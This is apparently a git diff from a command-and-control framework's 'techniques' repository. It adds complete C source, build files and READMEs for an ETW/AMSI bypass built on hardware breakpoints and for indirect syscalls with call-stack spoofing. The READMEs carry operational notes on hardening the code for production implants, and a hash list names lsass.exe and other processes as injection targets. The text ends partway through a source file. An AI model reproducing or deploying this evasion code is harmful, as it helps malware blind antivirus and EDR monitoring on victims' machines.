fn_NtAllocateVirtualMemory +NtWriteVirtualMemory fn_NtWriteVirtualMemory +NtProtectVirtualMemory fn_NtProtectVirtualMemory +NtFreeVirtualMemory fn_NtFreeVirtualMemory +NtCreateThreadEx fn_NtCreateThreadEx +NtClose fn_NtClose +NtReadVirtualMemory fn_NtReadVirtualMemory +NtContinue fn_NtContinue +NtWaitForSingleObject fn_NtWaitForSingleObject +NtProtectVirtualMemory fn_NtPVM + +# ntdll helpers +RtlCaptureContext fn_RtlCaptureContext +RtlUserThreadStart fn_RtlUserThreadStart + +# ETW / AMSI targets (EDR hooks these) +EtwEventWrite fn_EtwEventWrite +EtwTiLogOpenProcess fn_EtwTiLogOpenProcess +EtwTiLogReadWriteVm fn_EtwTiLogReadWriteVm +EtwTiLogDuplicateHandle fn_EtwTiLogDuplicateHandle +AmsiScanBuffer fn_AmsiScanBuffer +AmsiScanString fn_AmsiScanString + +# Common process names (injection targets) +svchost.exe str_svchost +explorer.exe str_explorer +lsass.exe str_lsass +RuntimeBroker.exe str_RuntimeBroker + +# Privilege names +SeDebugPrivilege str_SeDebugPrivilege +SeImpersonatePrivilege str_SeImpersonatePrivilege diff --git a/techniques/hwbp-evasion/Makefile b/techniques/hwbp-evasion/Makefile new file mode 100644 index 0000000..301b740 --- /dev/null +++ b/techniques/hwbp-evasion/Makefile @@ -0,0 +1,27 @@ +CC = x86_64-w64-mingw32-gcc +CFLAGS = -O2 -Wall -Wextra \ + -Iinclude \ + -fno-asynchronous-unwind-tables \ + -fno-ident \ + -fno-stack-protector +LDFLAGS = -lamsi + +SRC = src/hwbp_evasion.c src/demo.c +OBJ = $(patsubst src/%.c, build/%.o, $(SRC)) +TARGET = build/demo.exe + +all: build $(TARGET) + +build: + mkdir -p build + +build/%.o: src/%.c + $(CC) $(CFLAGS) -c $< -o $@ + +$(TARGET): $(OBJ) + $(CC) $(CFLAGS) $(OBJ) -o $@ $(LDFLAGS) + +clean: + rm -rf build + +.PHONY: all clean diff --git a/techniques/hwbp-evasion/README.md b/techniques/hwbp-evasion/README.md new file mode 100644 index 0000000..26ea7e5 --- /dev/null +++ b/techniques/hwbp-evasion/README.md @@ -0,0 +1,120 @@ +# hwbp-evasion + +ETW and AMSI bypass using hardware breakpoints and a Vectored Exception Handler (VEH). No patching, no memory writes to protected regions — the breakpoints live entirely in CPU debug registers. + +Extracted from [KHAOS C2](https://github.com/28Zaaky/khaos-c2). + +--- + +## How it works + +x64 debug registers `Dr0`–`Dr3` can each watch an address for execution. When the CPU hits a watched address, it raises `EXCEPTION_SINGLE_STEP` before executing the instruction. A VEH registered as the first handler in the chain intercepts that exception, manipulates the thread context, and returns `EXCEPTION_CONTINUE_EXECUTION` — the original function never executes. + +``` +hwbp_patch_all() + | + +-> resolve EtwEventWrite -> Dr0 + +-> resolve AmsiScanBuffer -> Dr1 + +-> resolve AmsiScanString -> Dr2 + +-> set Dr7 local enable bits + +-> AddVectoredExceptionHandler(1, _hwbp_veh) <- first in chain + +[AV calls AmsiScanBuffer] + | + +-> CPU fires EXCEPTION_SINGLE_STEP (Dr1 match) + | + +-> _hwbp_veh() + Rax = E_INVALIDARG (0x80070057) + Rip = [Rsp] <- skip to caller's return address + Rsp += 8 + Dr6 &= ~0x2 <- clear B1 status bit + return EXCEPTION_CONTINUE_EXECUTION + +[AmsiScanBuffer never executed — caller sees E_INVALIDARG] +``` + +Same logic for `EtwEventWrite` (returns `STATUS_SUCCESS`) and `AmsiScanString` (returns `E_INVALIDARG`). + +--- + +## Why hardware breakpoints + +Compared to memory patching (`mov rax, ret`) or inline hooks: + +- **No writes to protected pages** — no `VirtualProtect` calls that EDR hooks watch +- **No detectable byte modifications** in ntdll or amsi.dll — memory integrity scans find nothing +- **Per-thread** — debug registers are thread-local, so the bypass only applies to threads where `hwbp_apply_thread` is called +- **Revocable at runtime** — clear Dr7 bits to disable without touching any DLL + +The tradeoff: Dr0–Dr3 are also used by debuggers and some EDR products. If a debugger owns those registers, conflicts can occur. + +--- + +## API + +```c +void hwbp_patch_etw(void); // arm Dr0 -> EtwEventWrite +void hwbp_patch_amsi(void); // arm Dr1 -> AmsiScanBuffer, Dr2 -> AmsiScanString +void hwbp_patch_all(void); // arm all three + +void hwbp_apply_thread(HANDLE ht); // propagate active breakpoints to another thread +``` + +`hwbp_apply_thread` is useful when spawning new threads (e.g. the timer thread in sleep obfuscation) that will also call ETW-instrumented code. + +--- + +## Integration with sleep-obf + +The `.run` section attribute on `_hwbp_veh` keeps the handler executable when `.text` is `PAGE_NOACCESS` during obfuscated sleep: + +```c +// in your sleep callback, before encrypting .text: +g_sleep_obf_thread_hook = hwbp_apply_thread; +sleep_obf(5000); +``` + +This ensures the timer thread also has the breakpoints armed and won't trigger ETW during sleep. + +--- + +## Build + +```bash +make +./build/demo.exe +``` + +Expected output (on a system with AMSI loaded): + +``` +[*] without bypass: +[before] hr=0x00000000 result=32 detected=YES +[*] arming HWBP bypass... +[+] armed +[*] with bypass: +[after ] hr=0x80070057 result=0 detected=no +``` + +--- + +## Limitations + +- x64 only. +- Debug registers are thread-local. Call `hwbp_apply_thread` for every thread that needs the bypass. +- Some EDR products monitor `SetThreadContext` calls that modify debug registers. The call on `GetCurrentThread()` is less visible than cross-thread calls. +- If a kernel-mode ETW provider (`EtwTi*`) is active, this bypass does not cover it. See the ntdll-unhook technique for `EtwTiLogOpenProcess` / `EtwTiLogReadWriteVm` / `EtwTiLogDuplicateHandle`. + +--- + +## Operational notes + +This PoC uses plaintext strings and `GetModuleHandleA`. In production: + +- Resolve modules via PEB walk (`__readgsqword(0x60)`) +- Encrypt string literals at compile time +- Use `LoadLibraryA` only if amsi.dll is not already in the PEB module list — calling `LoadLibraryA` itself is a detectable event + +--- + +*Part of [KHAOS C2](https://github.com/28Zaaky/khaos-c2) — by [28Zaaky](https://github.com/28Zaaky)* diff --git a/techniques/hwbp-evasion/include/hwbp_evasion.h b/techniques/hwbp-evasion/include/hwbp_evasion.h new file mode 100644 index 0000000..2c88e3d --- /dev/null +++ b/techniques/hwbp-evasion/include/hwbp_evasion.h @@ -0,0 +1,18 @@ +#pragma once +#include + +/* + * hwbp_patch_etw() — arm Dr0 on EtwEventWrite + * hwbp_patch_amsi() — arm Dr1 on AmsiScanBuffer, Dr2 on AmsiScanString + * hwbp_patch_all() — arm all three (ETW + AMSI) + * + * Each call is idempotent — safe to call multiple times. + * Registers a VEH handler on first call. + * + * hwbp_apply_thread(ht) — propagate active breakpoints to another thread + * (e.g. a timer thread created during sleep obfuscation) + */ +void hwbp_patch_etw(void); +void hwbp_patch_amsi(void); +void hwbp_patch_all(void); +void hwbp_apply_thread(HANDLE hThread); diff --git a/techniques/hwbp-evasion/src/demo.c b/techniques/hwbp-evasion/src/demo.c new file mode 100644 index 0000000..e059370 --- /dev/null +++ b/techniques/hwbp-evasion/src/demo.c @@ -0,0 +1,83 @@ +#include "hwbp_evasion.h" +#include +#include + +/* AMSI types — no amsi.h dependency */ +typedef void *HAMSICONTEXT; +typedef void *HAMSISESSION; +typedef int AMSI_RESULT; +#define AMSI_RESULT_CLEAN 0 +#define AMSI_RESULT_DETECTED 32768 + +typedef HRESULT (WINAPI *AmsiInitialize_t) (LPCWSTR, HAMSICONTEXT *); +typedef HRESULT (WINAPI *AmsiOpenSession_t) (HAMSICONTEXT, HAMSISESSION *); +typedef HRESULT (WINAPI *AmsiScanBuffer_t) (HAMSICONTEXT, void *, ULONG, LPCWSTR, HAMSISESSION, AMSI_RESULT *); +typedef void (WINAPI *AmsiCloseSession_t)(HAMSICONTEXT, HAMSISESSION); +typedef void (WINAPI *AmsiUninitialize_t)(HAMSICONTEXT); + +static struct { + AmsiInitialize_t Init; + AmsiOpenSession_t OpenSession; + AmsiScanBuffer_t ScanBuffer; + AmsiCloseSession_t CloseSession; + AmsiUninitialize_t Uninit; +} amsi; + +static int load_amsi(void) +{ + HMODULE h = LoadLibraryA("amsi.dll"); + if (!h) return 0; + amsi.Init = (AmsiInitialize_t) GetProcAddress(h, "AmsiInitialize"); + amsi.OpenSession = (AmsiOpenSession_t) GetProcAddress(h, "AmsiOpenSession"); + amsi.ScanBuffer = (AmsiScanBuffer_t) GetProcAddress(h, "AmsiScanBuffer"); + amsi.CloseSession = (AmsiCloseSession_t)GetProcAddress(h, "AmsiCloseSession"); + amsi.Uninit = (AmsiUninitialize_t)GetProcAddress(h, "AmsiUninitialize"); + return amsi.Init && amsi.ScanBuffer; +} + +static void test_amsi(const char *label) +{ + HAMSICONTEXT ctx = NULL; + HAMSISESSION ses = NULL; + + if (FAILED(amsi.Init(L"hwbp-demo", &ctx))) { + printf("[%s] AmsiInitialize failed\n", label); + return; + } + amsi.OpenSession(ctx, &ses); + + /* EICAR test string — blocked by every AV engine */ + const char eicar[] = + "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"; + + AMSI_RESULT result = AMSI_RESULT_CLEAN; + HRESULT hr = amsi.ScanBuffer(ctx, (void *)eicar, (ULONG)(sizeof(eicar) - 1), + L"eicar", ses, &result); + + printf("[%s] hr=0x%08lX result=%d detected=%s\n", + label, (unsigned long)hr, (int)result, + result >= AMSI_RESULT_DETECTED ? "YES" : "no"); + + amsi.CloseSession(ctx, ses); + amsi.Uninit(ctx); +} + +int main(void) +{ + if (!load_amsi()) { + printf("[!] amsi.dll not available\n"); + return 1; + } + + printf("[*] without bypass:\n"); + test_amsi("before"); + + printf("[*] arming HWBP (ETW + AMSI)...\n"); + hwbp_patch_all(); + printf("[+] armed Dr0=EtwEventWrite Dr1=AmsiScanBuffer Dr2=AmsiScanString\n"); + + printf("[*] with bypass:\n"); + test_amsi("after "); + + return 0; +} diff --git a/techniques/hwbp-evasion/src/hwbp_evasion.c b/techniques/hwbp-evasion/src/hwbp_evasion.c new file mode 100644 index 0000000..4a31125 --- /dev/null +++ b/techniques/hwbp-evasion/src/hwbp_evasion.c @@ -0,0 +1,128 @@ +#include "hwbp_evasion.h" +#include +#include + +/* + * PoC note: uses GetModuleHandleA/LoadLibraryA/GetProcAddress with plaintext + * strings. In production, replace with a PEB walk and encrypted string storage. + * See agent/src/evasion/evasion.c in KHAOS C2 for the hardened version. + */ + +static LPVOID g_etw_fn = NULL; /* EtwEventWrite -> Dr0 */ +static LPVOID g_amsi_fn = NULL; /* AmsiScanBuffer -> Dr1 */ +static LPVOID g_amsi_scan_fn = NULL; /* AmsiScanString -> Dr2 */ +static PVOID g_veh = NULL; + +/* + * VEH handler — must live in a section other than .text so it keeps executing + * if .text is PAGE_NOACCESS during sleep obfuscation (see sleep-obf technique). + * + * On EXCEPTION_SINGLE_STEP at a watched address: + * EtwEventWrite -> Rax = STATUS_SUCCESS (0) -> ETW call silently succeeds + * AmsiScanBuffer -> Rax = E_INVALIDARG (0x80070057) -> scan returns "clean" + * AmsiScanString -> Rax = E_INVALIDARG (0x80070057) -> scan returns "clean" + * + * Rip is advanced past the call by reading the return address off the stack, + * and the corresponding Bx status bit in Dr6 is cleared. + */ +__attribute__((section(".run"), noinline)) +static LONG WINAPI _hwbp_veh(EXCEPTION_POINTERS *ep) +{ + if (ep->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP) + return EXCEPTION_CONTINUE_SEARCH; + + CONTEXT *ctx = ep->ContextRecord; + BOOL handled = FALSE; + + if (g_etw_fn && (LPVOID)(uintptr_t)ctx->Rip == g_etw_fn) { + ctx->Rax = 0; + ctx->Rip = *(DWORD64 *)(uintptr_t)ctx->Rsp; + ctx->Rsp += 8; + ctx->Dr6 &= ~(DWORD64)0x1; + handled = TRUE; + } + + if (g_amsi_fn && (LPVOID)(uintptr_t)ctx->Rip == g_amsi_fn) { + ctx->Rax = 0x80070057; + ctx->Rip = *(DWORD64 *)(uintptr_t)ctx->Rsp; + ctx->Rsp += 8; + ctx->Dr6 &= ~(DWORD64)0x2; + handled = TRUE; + } + + if (g_amsi_scan_fn && (LPVOID)(uintptr_t)ctx->Rip == g_amsi_scan_fn) { + ctx->Rax = 0x80070057; + ctx->Rip = *(DWORD64 *)(uintptr_t)ctx->Rsp; + ctx->Rsp += 8; + ctx->Dr6 &= ~(DWORD64)0x4; + handled = TRUE; + } + + return handled ? EXCEPTION_CONTINUE_EXECUTION : EXCEPTION_CONTINUE_SEARCH; +} + +static void _ensure_veh(void) +{ + if (!g_veh) + g_veh = AddVectoredExceptionHandler(1, _hwbp_veh); +} + +/* Write Dr0/Dr1/Dr2/Dr7 on a thread via GetThreadContext/SetThreadContext */ +void hwbp_apply_thread(HANDLE hThread) +{ + if (!g_etw_fn && !g_amsi_fn && !g_amsi_scan_fn) return; + + CONTEXT ctx; + ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS; + if (!GetThreadContext(hThread, &ctx)) return; + + if (g_etw_fn) ctx.Dr0 = (DWORD64)(uintptr_t)g_etw_fn; + if (g_amsi_fn) ctx.Dr1 = (DWORD64)(uintptr_t)g_amsi_fn; + if (g_amsi_scan_fn) ctx.Dr2 = (DWORD64)(uintptr_t)g_amsi_scan_fn; + + /* + * Dr7 encoding: + * Bits 0,2,4 = local enable for Dr0, Dr1, Dr2 + * Clear bits [15:0] first to reset any existing conditions, + * then set only the breakpoints we have targets for. + */ + ctx.Dr7 &= ~(DWORD64)0x0FFF0015; + ctx.Dr7 |= g_etw_fn ? 0x01 : 0; + ctx.Dr7 |= g_amsi_fn ? 0x04 : 0; + ctx.Dr7 |= g_amsi_scan_fn ? 0x10 : 0; + + SetThreadContext(hThread, &ctx); +} + +void hwbp_patch_etw(void) +{ + if (!g_etw_fn) { + HMODULE h = GetModuleHandleA("ntdll.dll"); + if (h) g_etw_fn = (LPVOID)GetProcAddress(h, "EtwEventWrite"); + } + _ensure_veh(); + hwbp_apply_thread(GetCurrentThread()); +} + +void hwbp_patch_amsi(void) +{ + if (!g_amsi_fn || !g_amsi_scan_fn) { + /* amsi.dll may not be loaded yet — force load it */ + HMODULE h = GetModuleHandleA("amsi.dll"); + if (!h) h = LoadLibraryA("amsi.dll"); + if (h) { + if (!g_amsi_fn) + g_amsi_fn = (LPVOID)GetProcAddress(h, "AmsiScanBuffer"); + if (!g_amsi_scan_fn) + g_amsi_scan_fn = (LPVOID)GetProcAddress(h, "AmsiScanString"); + } + } + _ensure_veh(); + hwbp_apply_thread(GetCurrentThread()); +} + +void hwbp_patch_all(void) +{ + hwbp_patch_etw(); + hwbp_patch_amsi(); +} diff --git a/techniques/indirect-syscalls/Makefile b/techniques/indirect-syscalls/Makefile new file mode 100644 index 0000000..25ed28a --- /dev/null +++ b/techniques/indirect-syscalls/Makefile @@ -0,0 +1,33 @@ +CC = x86_64-w64-mingw32-gcc +CFLAGS = -O2 -Wall -Wextra \ + -Iinclude \ + -fno-asynchronous-unwind-tables \ + -fno-ident \ + -fno-stack-protector +LDFLAGS = -lntdll + +SRC_C = src/indirect_syscall.c src/demo.c +SRC_S = src/spoof_stub.S +OBJ_C = $(patsubst src/%.c, build/%.o, $(SRC_C)) +OBJ_S = $(patsubst src/%.S, build/%.o, $(SRC_S)) +OBJ = $(OBJ_C) $(OBJ_S) +TARGET = build/demo.exe + +all: build $(TARGET) + +build: + mkdir -p build + +build/%.o: src/%.c + $(CC) $(CFLAGS) -c $< -o $@ + +build/%.o: src/%.S + $(CC) $(CFLAGS) -c $< -o $@ + +$(TARGET): $(OBJ) + $(CC) $(CFLAGS) $(OBJ) -o $@ $(LDFLAGS) + +clean: + rm -rf build + +.PHONY: all clean diff --git a/techniques/indirect-syscalls/README.md b/techniques/indirect-syscalls/README.md new file mode 100644 index 0000000..8b64749 --- /dev/null +++ b/techniques/indirect-syscalls/README.md @@ -0,0 +1,195 @@ +# indirect-syscalls + +Indirect syscalls with Hell's Gate + Halo's Gate SSN resolution and 2-frame call-stack spoofing for Windows x64. + +Extracted from [KHAOS C2](https://github.com/28Zaaky/khaos-c2). + +--- + +## What this solves + +EDR products hook userland syscall stubs in ntdll by overwriting their first bytes with a JMP to a monitoring trampoline: + +``` +NtOpenProcess (hooked): + E9 xx xx xx xx JMP + ... + +NtOpenProcess (clean): + 4C 8B D1 mov r10, rcx + B8 26 00 00 00 mov eax, 0x26 ; SSN + 0F 05 syscall + C3 ret +``` + +Two problems to solve: + +1. **SSN recovery** — the `mov eax` is gone; we need to find the real syscall number. +2. **syscall origin** — even with the right SSN, a `syscall` instruction in our own code is flagged by telemetry that checks the source module. The instruction must appear to come from ntdll. + +--- + +## How it works + +### SSN resolution + +**Hell's Gate** (unhooked stub): + +``` +fn[0..3] == 4C 8B D1 B8 → SSN = *(uint16_t *)(fn + 4) +``` + +**Halo's Gate** (hooked stub — JMP trampoline at fn[0]): + +Walk ntdll's EAT to find the position of `name` in the sorted name table, then scan neighbors ±32 positions for a clean `4C 8B D1 B8` stub. Since Nt* syscalls are numbered in sorted-name order, a clean neighbor at distance `d` has `SSN ± d`: + +``` +for d in 1..32: + neighbor_at(idx - d) → SSN = neighbor_ssn + d + neighbor_at(idx + d) → SSN = neighbor_ssn - d +``` + +### Indirect syscall gadget + +Scan ntdll `.text` for the byte sequence `0F 05 C3` (`syscall; ret`). Any Nt* stub contains it. Jumping into this gadget makes ETW telemetry record the source as ntdll, not our implant. + +### Call-stack spoofing + +Before the jump to the gadget, two fake return addresses are pushed onto the stack: + +``` +[rsp+0x00] = ret in KernelBase .text ← inner spoof frame +[rsp+0x08] = ret in ntdll .text ← outer spoof frame +[rsp+0x10] = real return address (our code) +``` + +Stack walk during the syscall shows: +``` +NtXxx → KernelBase! → ntdll! → [our code] +``` + +Rather than: +``` +NtXxx → [our code] ← obvious +``` + +### Argument remapping (`spoof_stub.S`) + +Windows x64 calling convention → Nt* ABI: + +``` +rcx (ssn) → eax (syscall number) +rdx (a1) → r10 (first Nt* arg — Nt* stubs do: mov r10,rcx; then syscall clobbers rcx) +r8 (a2) → rdx +r9 (a3) → r8 +[+0x28] a4 → r9 +[+0x28..0x58]: a5..a11 shifted down by 0x10 to account for the 2 pushed spoof frames +``` + +--- + +## API + +```c +#include "indirect_syscall.h" + +// Initialize — find gadgets. Call once before sc_ssn/sc_call. +// Returns 0 on success, -1 if ntdll has no syscall;ret sequence. +int sc_init(void); + +// Resolve SSN for any Nt* function. +// Hell's Gate if stub is clean; Halo's Gate if hooked. +// Returns 0xFFFF on failure. +uint16_t sc_ssn(const char *name); + +// Indirect syscall with call-stack spoofing. +// Caller must zero unused trailing args. +NTSTATUS sc_call(uint16_t ssn, + uintptr_t a1, uintptr_t a2, uintptr_t a3, + uintptr_t a4, uintptr_t a5, uintptr_t a6, + uintptr_t a7, uintptr_t a8, uintptr_t a9, + uintptr_t a10, uintptr_t a11); +``` + +### Example + +```c +sc_init(); + +uint16_t ssn = sc_ssn("NtAllocateVirtualMemory"); + +HANDLE proc = (HANDLE)(LONG_PTR)-1; +PVOID base = NULL; +SIZE_T sz = 0x1000; + +NTSTATUS st = sc_call(ssn, + (uintptr_t)proc, + (uintptr_t)&base, + 0, + (uintptr_t)&sz, + MEM_COMMIT | MEM_RESERVE, + PAGE_READWRITE, + 0, 0, 0, 0, 0); +``` + +--- + +## Build + +Requires MinGW-w64 cross-compiler. + +```bash +make +./build/demo.exe +``` + +Expected output: + +``` +[+] sc_gadget = 00007ffe2fd9fbe2 (syscall;ret in ntdll .text) +[+] sc_frame1 = 00007ffe2d2031c9 (KernelBase ret gadget) +[+] sc_frame2 = 00007ffe2fc441d9 (ntdll ret gadget) + +[*] SSN NtAllocateVirtualMemory = 0x0018 +[*] SSN NtProtectVirtualMemory = 0x0050 +[*] SSN NtFreeVirtualMemory = 0x001E +[*] SSN NtWriteVirtualMemory = 0x003A +[*] SSN NtOpenProcess = 0x0026 + +[+] NtAllocateVirtualMemory: base=... sz=0x1000 st=0x00000000 +[+] NtProtectVirtualMemory: st=0x00000000 old_prot=0x4 +[*] VirtualQuery Protect = 0x20 (expected 0x20 = PAGE_EXECUTE_READ) +[+] page is PAGE_EXECUTE_READ — indirect syscalls working correctly +``` + +--- + +## Limitations + +- x64 only. +- Halo's Gate scans ±32 neighbors. If all 64 neighbors are hooked (uncommon), SSN resolution fails and `sc_ssn()` returns `0xFFFF`. +- Call-stack spoofing is 2 frames deep. A thorough stack inspection (unwind data validation, module range checks) will see our code at `[rsp+0x10]`. Full synthetic stack spoofing requires building proper unwind data and a complete ROP frame chain — out of scope for this PoC. +- `sc_ssn()` uses `strcmp` on EAT names, which are ASCII and sorted. This is standard EAT iteration with no obfuscation — replace with a hash walk in production. +- Gadget addresses change on every reboot (ASLR). `sc_init()` must be called in-process. + +--- + +## Operational notes + +This PoC uses `GetModuleHandleA`/`GetProcAddress` with plaintext strings. In production: + +- Replace with a PEB walk (`__readgsqword(0x60)`) to resolve modules. +- Encrypt sensitive string literals (see EVS XOR in KHAOS C2). +- Call `sc_init()` early — before EDR DLLs load via `DLL_PROCESS_ATTACH` if possible. + +The `sc_gadget` address can be cached; it points into ntdll `.text` which is stable within a process lifetime (even after ntdll unhooking, the `syscall;ret` bytes remain). + +--- + +## Credits + +Technique originally described by [Hell's Gate](https://github.com/am0nsec/HellsGate) (am0nsec / smelly__vx) and extended by [Halo's Gate](https://blog.sektor7.net/#!res/2021/halosgate.md) (Sektor7). Call-stack spoofing approach from [SilentMoonwalk](https://github.com/klezVirus/SilentMoonwalk) (klezVirus). This implementation integrates all three into a single compact dispatcher. + +--- + +*Part of [KHAOS C2](https://github.com/28Zaaky/khaos-c2) — by [28Zaaky](https://github.com/28Zaaky)* diff --git a/techniques/indirect-syscalls/build/demo.exe b/techniques/indirect-syscalls/build/demo.exe new file mode 100644 index 0000000..2132762 Binary files /dev/null and b/techniques/indirect-syscalls/build/demo.exe differ diff --git a/techniques/indirect-syscalls/build/demo.o b/techniques/indirect-syscalls/build/demo.o new file mode 100644 index 0000000..4e3ded1 Binary files /dev/null and b/techniques/indirect-syscalls/build/demo.o differ diff --git a/techniques/indirect-syscalls/build/indirect_syscall.o b/techniques/indirect-syscalls/build/indirect_syscall.o new file mode 100644 index 0000000..9eb6353 Binary files /dev/null and b/techniques/indirect-syscalls/build/indirect_syscall.o differ diff --git a/techniques/indirect-syscalls/build/spoof_stub.o b/techniques/indirect-syscalls/build/spoof_stub.o new file mode 100644 index 0000000..9e2ca09 Binary files /dev/null and b/techniques/indirect-syscalls/build/spoof_stub.o differ diff --git a/techniques/indirect-syscalls/include/indirect_syscall.h b/techniques/indirect-syscalls/include/indirect_syscall.h new file mode 100644 index 0000000..c5338c7 --- /dev/null +++ b/techniques/indirect-syscalls/include/indirect_syscall.h @@ -0,0 +1,54 @@ +#pragma once +#include +#include + +/* + * PoC note: this file uses GetModuleHandleA/GetProcAddress for simplicity. + * In production, replace with a PEB walk and EVS XOR string obfuscation. + */ + +/* + * Pointers used by spoof_stub.S — must be initialized by sc_init(). + * sc_gadget : syscall;ret sequence inside ntdll .text + * sc_frame1 : single `ret` in KernelBase .text (inner spoof frame) + * sc_frame2 : single `ret` in ntdll .text (outer spoof frame) + */ +extern void *sc_gadget; +extern void *sc_frame1; +extern void *sc_frame2; + +/* + * sc_init() — find gadgets, must be called once before sc_ssn/sc_call. + * Returns 0 on success, -1 if ntdll has no syscall;ret sequence. + */ +int sc_init(void); + +/* + * sc_ssn(name) — resolve the syscall number for an Nt* function. + * + * Hell's Gate : stub starts with `4C 8B D1 B8 xx xx` → read SSN directly. + * Halo's Gate : stub hooked (JMP trampoline) → walk EAT for a clean neighbor, + * then compute SSN by adjusting the neighbor's SSN by the delta. + * + * Returns 0xFFFF on failure. + */ +uint16_t sc_ssn(const char *name); + +/* + * sc_call(ssn, a1..a11) — indirect syscall dispatcher. + * + * - Jumps to a `syscall;ret` gadget inside ntdll .text (not our own code). + * - Pushes two fake return addresses onto the stack before the jmp: + * [rsp+0x00] = sc_frame1 (ret in KernelBase .text) + * [rsp+0x08] = sc_frame2 (ret in ntdll .text) + * Stack walk during the syscall shows: Nt* → KernelBase → ntdll → caller. + * - Remaps arguments to Windows Nt* ABI (r10=a1, rdx=a2, r8=a3, r9=a4, + * a5..a11 on stack at [rsp+0x28..]). + * + * Caller must zero unused trailing args. + */ +extern NTSTATUS sc_call(uint16_t ssn, + uintptr_t a1, uintptr_t a2, uintptr_t a3, + uintptr_t a4, uintptr_t a5, uintptr_t a6, + uintptr_t a7, uintptr_t a8, uintptr_t a9, + uintptr_t a10, uintptr_t a11); diff --git a/techniques/indirect-syscalls/src/demo.c b/techniques/indirect-syscalls/src/demo.c new file mode 100644 index 0000000..e1248b8 --- /dev/null +++ b/techniques/indirect-syscalls/src/demo.c @@ -0,0 +1,117 @@ +#include "indirect_syscall.h" +#include +#include + +/* + * Demo: allocate a page via indirect NtAllocateVirtualMemory, write bytes, + * flip to PAGE_EXECUTE_READ via indirect NtProtectVirtualMemory, verify. + * + * On an EDR-hooked system, sc_ssn() uses Halo's Gate to recover the real SSN + * even when the syscall stub starts with a JMP trampoline. + */ + +int main(void) +{ + printf("[*] sc_init()...\n"); + if (sc_init() != 0) { + printf("[!] sc_init failed — no syscall;ret gadget found in ntdll .text\n"); + return 1; + } + + printf("[+] sc_gadget = %p (syscall;ret in ntdll .text — indirect jmp target)\n", + sc_gadget); + printf("[+] sc_frame1 = %p (KernelBase ret gadget — inner spoof frame)\n", + sc_frame1); + printf("[+] sc_frame2 = %p (ntdll ret gadget — outer spoof frame)\n\n", + sc_frame2); + + /* Resolve SSNs */ + uint16_t ssn_alloc = sc_ssn("NtAllocateVirtualMemory"); + uint16_t ssn_prot = sc_ssn("NtProtectVirtualMemory"); + uint16_t ssn_free = sc_ssn("NtFreeVirtualMemory"); + uint16_t ssn_write = sc_ssn("NtWriteVirtualMemory"); + uint16_t ssn_open = sc_ssn("NtOpenProcess"); + + printf("[*] SSN NtAllocateVirtualMemory = 0x%04X\n", ssn_alloc); + printf("[*] SSN NtProtectVirtualMemory = 0x%04X\n", ssn_prot); + printf("[*] SSN NtFreeVirtualMemory = 0x%04X\n", ssn_free); + printf("[*] SSN NtWriteVirtualMemory = 0x%04X\n", ssn_write); + printf("[*] SSN NtOpenProcess = 0x%04X\n\n", ssn_open); + + if (ssn_alloc == 0xFFFF || ssn_prot == 0xFFFF) { + printf("[!] SSN resolve failed — Halo's Gate unable to find clean neighbor\n"); + return 1; + } + + /* + * NtAllocateVirtualMemory(ProcessHandle, BaseAddress, ZeroBits, + * RegionSize, AllocationType, Protect) + */ + HANDLE proc = (HANDLE)(LONG_PTR)-1; /* current process */ + PVOID base = NULL; + SIZE_T sz = 0x1000; + + NTSTATUS st = sc_call(ssn_alloc, + (uintptr_t)proc, + (uintptr_t)&base, + 0, + (uintptr_t)&sz, + (uintptr_t)(MEM_COMMIT | MEM_RESERVE), + (uintptr_t)PAGE_READWRITE, + 0, 0, 0, 0, 0); + + if (st != 0 || !base) { + printf("[!] NtAllocateVirtualMemory failed: 0x%08X\n", (unsigned)st); + return 1; + } + printf("[+] NtAllocateVirtualMemory: base=%p sz=0x%zX st=0x%08X\n", + base, sz, (unsigned)st); + + /* Write a recognizable marker — page is PAGE_READWRITE at this point */ + ((BYTE *)base)[0] = 0xDE; + ((BYTE *)base)[1] = 0xAD; + ((BYTE *)base)[2] = 0xBE; + ((BYTE *)base)[3] = 0xEF; + + /* + * NtProtectVirtualMemory(ProcessHandle, BaseAddress, RegionSize, + * NewProtect, OldProtect) + */ + PVOID pbase = base; + SIZE_T psz = 0x1000; + ULONG old = 0; + + st = sc_call(ssn_prot, + (uintptr_t)proc, + (uintptr_t)&pbase, + (uintptr_t)&psz, + (uintptr_t)PAGE_EXECUTE_READ, + (uintptr_t)&old, + 0, 0, 0, 0, 0, 0); + + printf("[%c] NtProtectVirtualMemory: st=0x%08X old_prot=0x%lX\n", + st == 0 ? '+' : '!', (unsigned)st, old); + + /* Verify via VirtualQuery — does not go through ntdll hooks */ + MEMORY_BASIC_INFORMATION mbi = {0}; + VirtualQuery(base, &mbi, sizeof(mbi)); + printf("[*] VirtualQuery Protect = 0x%lX (expected 0x%lX = PAGE_EXECUTE_READ)\n", + mbi.Protect, (ULONG)PAGE_EXECUTE_READ); + + BOOL ok = (st == 0 && mbi.Protect == PAGE_EXECUTE_READ); + printf("[%c] page is %s\n", ok ? '+' : '!', + ok ? "PAGE_EXECUTE_READ — indirect syscalls working correctly" + : "UNEXPECTED — check output above"); + + /* NtFreeVirtualMemory */ + PVOID fbase = base; + SIZE_T fsz = 0; + sc_call(ssn_free, + (uintptr_t)proc, + (uintptr_t)&fbase, + (uintptr_t)&fsz, + (uintptr_t)MEM_RELEASE, + 0, 0, 0, 0, 0, 0, 0); + + return ok ? 0 : 1; +} diff --git a/techniques/indirect-syscalls/src/indirect_syscall.c b/techniques/indirect-syscalls/src/indirect_syscall.c new file mode 100644 index 0000000..dfe0412 --- /dev/null +++ b/techniques/indirect-syscalls/src/indirect_syscall.c @@ -0,0 +1,96 @@ +#include "indirect_syscall.h" +#include +#include +#include + +void *sc_gadget = NULL; +void *sc_frame1 = NULL; +void *sc_frame2 = NULL; + +/* Scan ntdll/KernelBase .text for a byte sequence starting at min_off bytes in. */ +static BYTE *_find_seq(HMODULE h, const BYTE *seq, int seqlen, SIZE_T min_off) +{ + if (!h) return NULL; + IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)(void *)h; + IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)((BYTE *)h + dos->e_lfanew); + IMAGE_SECTION_HEADER *sec = IMAGE_FIRST_SECTION(nt); + for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) { + if (memcmp(sec->Name, ".text", 5) != 0) continue; + BYTE *base = (BYTE *)h + 